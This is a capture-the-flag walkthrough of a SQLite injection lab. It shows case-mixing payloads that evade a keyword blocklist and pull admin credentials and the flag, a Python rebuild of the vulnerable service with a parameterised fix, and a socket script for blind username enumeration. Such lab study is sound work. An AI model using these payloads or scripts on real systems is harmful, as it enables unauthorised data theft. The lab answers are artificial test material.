Light

Last modified: 2025-03-26 19:29:39

Machine Name OS IP Address Difficulty
Light Linux 10.10.89.204 Easy

What is the admin username?


A service is running on port 1337, and we can interact with it using:

nc 10.10.144.115 1337

Probing with a few inputs produces three distinct responses: a known username returns its password, an unknown username returns "Username not found.", and a lone single quote returns a database error:

└─# nc 10.10.144.115 1337
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: test
Username not found.
Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"

The single quote breaks the query, which points to SQL injection, and the error message leaks the tail of the statement: our input is placed inside a single-quoted string literal that is followed by ' LIMIT 30, so every payload has to account for that trailing quote.

The wording "unrecognized token" is SQLite's own error text, so the underlying DBMS is SQLite, as the room's name, Light, also hints.

However, certain characters and keywords are restricted:

Please enter your username: --
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: UNION
Ahh there is a word in there I don't like :(
Please enter your username: SELECT
Ahh there is a word in there I don't like :(

The keyword check is case-sensitive, so mixed-case spellings such as UnIoN and SeLect pass it. Each payload opens with a quote to close the string literal and ends with a quote so that the original query's trailing ' LIMIT 30 stays syntactically valid (SQLite parses the leftover '' as an empty alias). With this technique we can identify the SQLite version:

Please enter your username:' UnIoN SeLect sqlite_version() '
Password: 3.31.1

Next, we enumerate the table names:

Please enter your username:' UnIoN SeLect group_concat(name, ',') FROM sqlite_master WHERE type='table
Password: usertable,admintable

| Note: The injected SELECT must return the same number of columns as the original query (one), and the service prints only the first row, so group_concat is used to collapse all matching rows into a single value.

To enumerate the columns of the admintable:

Please enter your username:' UnIoN SeLect group_concat(name, ',') FROM pragma_table_info('admintable') '
Password: id,username,password

Now we extract all usernames from the admintable:

Please enter your username:' UnIoN SeLect group_concat(username, ',') FROM admintable '
Password: TryHackMeAdmin,flag

✅ The admin username is: TryHackMeAdmin
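To make the mechanics reproducible without the room, the following added example (not code from the room or from this write-up) rebuilds the query shape the leaked error implies, SELECT password FROM usertable WHERE username = '<input>' LIMIT 30, together with the blocklist, on an in-memory SQLite database seeded with the values recovered above. The query text, the case-sensitive keyword check and the table layout are assumptions inferred from the responses on this page; safe_lookup at the end is the parameterised fix a developer would apply.

```python
import sqlite3

# Assumed reconstruction of the Light service (not its real source): the
# query shape comes from the leaked error ("''' LIMIT 30"), the filters from
# the responses quoted above, and the table contents from the results.
BLOCKED_SUBSTRINGS = ("/*", "--", "%0b")
BLOCKED_WORDS = ("UNION", "SELECT")  # assumed case-sensitive: UnIoN gets through


def build_db():
    """In-memory SQLite database seeded with the values recovered on this page."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE usertable  (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE admintable (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO usertable  (username, password) VALUES ('smokey', 'vYQ5ngPpw8AdUmL');
        INSERT INTO admintable (username, password) VALUES
            ('TryHackMeAdmin', 'mamZtAuMlrsEy5bp6q17'),
            ('flag', 'THM{SQLit3_InJ3cTion_is_SimplE_nO?}');
    """)
    return db


def vulnerable_lookup(db, username):
    """Blocklist first, then string-concatenated SQL: the pattern the service exhibits."""
    if any(bad in username for bad in BLOCKED_SUBSTRINGS):
        return "For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)"
    if any(word in username for word in BLOCKED_WORDS):
        return "Ahh there is a word in there I don't like :("
    # The trailing "' LIMIT 30" is what every payload's final quote has to balance.
    query = f"SELECT password FROM usertable WHERE username = '{username}' LIMIT 30"
    try:
        row = db.execute(query).fetchone()  # only the first row is ever shown
    except sqlite3.OperationalError as exc:
        return f"Error: {exc}"
    return f"Password: {row[0]}" if row else "Username not found."


def safe_lookup(db, username):
    """Same lookup with a bound parameter: the input can never alter the query."""
    row = db.execute(
        "SELECT password FROM usertable WHERE username = ? LIMIT 30", (username,)
    ).fetchone()
    return f"Password: {row[0]}" if row else "Username not found."


def extract(db, payload):
    """Return just the data part of a successful injection, or None."""
    reply = vulnerable_lookup(db, payload)
    return reply[len("Password: "):] if reply.startswith("Password: ") else None


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_lookup(db, "'"))                # leaks the query tail
    print(vulnerable_lookup(db, "' UNION SELECT 1"))  # caught by the keyword filter
    print(extract(db, "' UnIoN SeLect sqlite_version() '"))
    print(extract(db, "' UnIoN SeLect group_concat(name, ',') FROM sqlite_master WHERE type='table"))
    print(extract(db, "' UnIoN SeLect group_concat(name, ',') FROM pragma_table_info('admintable') '"))
    print(extract(db, "' UnIoN SeLect password FROM admintable WHERE username='flag"))
    print(safe_lookup(db, "' UnIoN SeLect password FROM admintable WHERE username='flag"))
```

The blocklist is kept deliberately so the model fails the same way the service does: it catches the literal tokens and nothing else, while the bound parameter in safe_lookup makes the same payload an ordinary (non-existent) username.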

What is the password to the username mentioned in question 1?


To extract the admin password:

Please enter your username:' UnIoN SeLect password from admintable where username='TryHackMeAdmin
Password: mamZtAuMlrsEy5bp6q17

✅ The admin password is: mamZtAuMlrsEy5bp6q17

What is the flag?


We retrieve the value for the flag user:

Please enter your username:' UnIoN SeLect password FROM admintable WHERE username='flag
Password: THM{SQLit3_InJ3cTion_is_SimplE_nO?}

Flag: THM{SQLit3_InJ3cTion_is_SimplE_nO?}

Enumerating Users via Blind SQL Injection


When UNION-based extraction is not available, the service can still be used as a boolean oracle: the payload ' or username like 'prefix% returns "Password: ..." if at least one username starts with the prefix and "Username not found." otherwise (neither or nor like is on the blocklist). The following Python script enumerates the usernames in the table the service queries by extending a prefix one character at a time:

import socket
import string

# Characters tried at each position. SQLite's LIKE is case-insensitive for
# ASCII letters, so lowercase candidates also match uppercase characters in
# the stored name; recovered names therefore come back in lowercase.
ALPHABET = string.ascii_lowercase + string.digits


def query(target_ip, target_port, payload):
    """Open a fresh connection, send one username payload, return the reply."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((target_ip, target_port))
        s.recv(1024)  # "Welcome to the Light database!"
        s.recv(1024)  # "Please enter your username: "
        s.sendall(f"{payload}\n".encode("utf-8"))
        return s.recv(1024).decode("utf-8", errors="replace")


def bruteforce_username(target_ip, target_port, prefix=""):
    """Depth-first enumeration of every username that starts with `prefix`."""
    # LIKE without a wildcard is an exact (case-insensitive) match, so this
    # tells us whether `prefix` itself is a complete username.
    if prefix and "Password:" in query(target_ip, target_port, f"' or username like '{prefix}"):
        print(f"[+] Username found: {prefix}")

    for char in ALPHABET:
        candidate = prefix + char
        # "Password:" means at least one username starts with the candidate,
        # "Username not found." means none does.
        response = query(target_ip, target_port, f"' or username like '{candidate}%")
        if "Password:" in response:
            print(f"[+] Valid username prefix: {candidate}")
            bruteforce_username(target_ip, target_port, candidate)


if __name__ == "__main__":
    bruteforce_username("10.10.144.115", 1337)

⚠️ This approach costs up to one request per candidate character for every position of every name, and LIKE matches case-insensitively, so it is significantly slower and should be used as a last resort when direct extraction is blocked.
